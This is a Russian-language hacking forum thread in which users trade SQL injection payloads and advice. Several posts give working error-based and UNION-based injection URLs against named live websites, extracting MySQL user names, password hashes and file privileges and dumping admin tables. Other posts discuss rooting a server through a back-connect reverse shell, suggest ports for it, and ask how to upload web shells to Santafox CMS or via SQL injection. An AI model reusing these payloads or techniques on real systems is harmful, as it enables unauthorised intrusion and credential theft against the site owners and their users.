GroM88 http://www.totalbhakti.com/shop.php?cid=2+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1-- error based mysql юзверы (дада,майскул доступен на чтение) http://www.totalbhakti.com/shop.php?cid=2+and(select+1+from(select+count(*),concat((select+(select+(SELECT+concat_ws(0x3a,user,password,file_priv)+from+mysql.user+limit+0,1) )+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from information_schema.tables+group+by+x)a)+and+1=1
Глупый вопрос) но все же) Какие запросы использовать в скуле что бы просматривать таблицы из определенной БД? ну т.е. information_schema.tables выводит все таблицы из всех бд) а мне надо посмотреть таблицы из определенной бд)
http://www.grieger-boote.de/product_info.php?products_id=3934' or 1 group by concat((select version()),floor(rand(0)*2)) having min(0) or 1 -- 1
Спасибо но тогда вопрос почему здесь не катит так же ? http://www.drachenshop.de/product_info.php?products_id=555'
имеется один сервак с старым ядром, хочу порутать.. делаю бек-коннект, коннект доходит но сразу же отрубает меня.. пробовал биндить порты (53, 81, 31337) - то же самое. есть идеи?
попробуй другие порты, мне повезло с этими. 8000, 31336 select table_name from information_schema.tables where table_schema='перечитай_маны_по_скулям'
http://www.webmallindia.com/gifts/productlist.php?catid=-203%20+union+select+1,2,3,4,column_name,6,7,8%20from%20information_schema.columns%20where%20table_name=0x5472616e73616374%20limit%2011,1 Возможно ли вывести любое поле из этой таблицы ?
можно! Code: http://www.webmallindia.com/gifts/productlist.php?catid=-203+union+select+unhex%28hex%28group_concat%28id,0x3a,action,0x3a,adminid,0x3a,tablename,0x3a,record_id,0x3a,actiontime%29%29%29+from+admin_transaction%20--+ Code: http://www.webmallindia.com/gifts/productlist.php?catid=-203+union+select+unhex%28hex%28group_concat%28cd_id,0x3a,cd_name,0x3a,cd_catid,0x3a,cd_gen,0x3a,cd_lan,0x3a,cd_make,0x3a,cd_typ,0x3a,cd_flag,0x3a,cd_img,0x3a,cd_desc,0x3a,cd_inline_desc,0x3a,cd_price,0x3a,cd_discount,0x3a,cd_vendor,0x3a,cd_approve%29%29%29+from+cd
Подскажите как залить шелл, в CMS Santafox, стоят фильтры на все! Пытаюсь через добавление картинок/видео, выкидывает ошибку, пробовал разными методами, нефига, все перепробовал. Помогите может кто работал с этой КМСкой, или знает иные способы заливки шелла?
такс давайте выносим какие нить изменения!, с этого дня здесь не постим скули вида id=1' я все равно их буду удалять. здесь помогают раскрутить багу, если есть какие нить не понятные моменты, пишите, "вот делаю запрос не получается" или "подобрал калонки, вывода нет" или хз что там но не пишите, помогите раскрутить ид=1' =\ вам это не онлайн инжектор.
Всем привет Не так давно решил заняться sql инжектами. много читал, много думал... не в этом суть Проблем с нахождением и раскручиванием нету... Проблема в другом - в 90% случаев от баз толку ноль, ничего хорошего в них не находится Соответственно сайтик остается без шелла Не порядок ) Посоветуйте - как бы все же средствами скуля залить на этот сайт что нибудь...
у некоторых от начало заниматся скулями до заливки шеллов и превращения их в ликвид уходят годы...способоб заливки тысячи и зависит от КМС, админки, состояние сервера и тд и тп..тебе тут целый мануал выложить что ли? ЗЫ. Забыл сказать вам начинающим скулерам, сайты которые вы хекаете..давно уже перехеканы до вас...так что заливка шелла вам многого не даст...ну конечно за рeдким исключением .
Я и не спорю что новичек И прекрасно знаю что я знаю и умею пока дай бог процентов 10%... Просто большинство пользуется стандартной схемой - инж -> поиск базы с пассом -> заливка/поиск как залить шелл из админки. С этим все понятно. Меня интересует что делать если в базе ничего хорошего не обнаружено, админки вообще нету... Т.е. доступ есть только к скулю... P.S. Писать подробный мануал я и не прошу - прошу пнуть в нужную сторону
